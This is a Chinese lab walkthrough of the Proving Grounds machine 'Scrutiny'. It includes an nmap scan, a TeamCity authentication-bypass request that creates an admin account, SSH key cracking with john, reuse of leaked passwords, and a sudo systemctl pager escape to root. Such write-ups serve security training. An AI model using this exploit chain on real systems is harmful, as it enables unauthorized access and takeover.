信息收集:
root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.216.91
Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-25 18:38 CST
Nmap scan report for 192.168.216.91
Host is up (0.0034s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
|_smtp-commands: onlyrands.com, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
| ssl-cert: Subject: commonName=onlyrands.com
| Subject Alternative Name: DNS:onlyrands.com
| Not valid before: 2024-06-07T09:33:24
|_Not valid after: 2034-06-05T09:33:24
|_ssl-date: TLS randomness does not represent time
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: OnlyRands
443/tcp closed https
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.3 (89%), Linux 2.6.32 - 3.1 (89%), Linux 3.7 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: onlyrands.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 2.17 ms 192.168.45.1
2 2.19 ms 192.168.45.254
3 3.82 ms 192.168.251.1
4 3.96 ms 192.168.216.91
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.98 seconds
80开放了http服务
点击login会跳转到 teams.onlyrands.com,将解析加入hosts,重新点击login
发包添加用户
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: teams.onlyrands.com
Content-Type: application/json
{"username": "test", "password": "test", "email": "[email protected]","roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
使用test/test成功登录系统,检索漏洞
尝试利用漏洞均失败了,换了很多 exp
在后台翻文件的时候发现了私钥文件
先用ssh2john转换格式
ssh2john id_rsa>hash.txt
然后使用john破解
john hash.txt --wordlist=~/rockyou.txt
得到密码cheer,使用用户:marcot,ssh登录系统(因为这个私钥是在marcot修改的
上传并运行 linpeas.sh,有很多的Mails
直接,发现用户凭证:IdealismEngineAshen476cat *
成功切换matthewa用户
在用户根目录下存在一个隐藏文件
有拿到一个密码:RefriedScabbedWasting502
在目录下找到Dach对应的用户:briand/etc/passwd
成功切换,用户根目录为/home/administration/briand
用户可以sudo无密码执行/usr/bin/systemctl status teamcity-server.service
执行
sudo /usr/bin/systemctl status teamcity-server.service
然后输入!sh
拿到proof和local
原文始发于微信公众号(EuSRC安全实验室):PG_Scrutiny
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论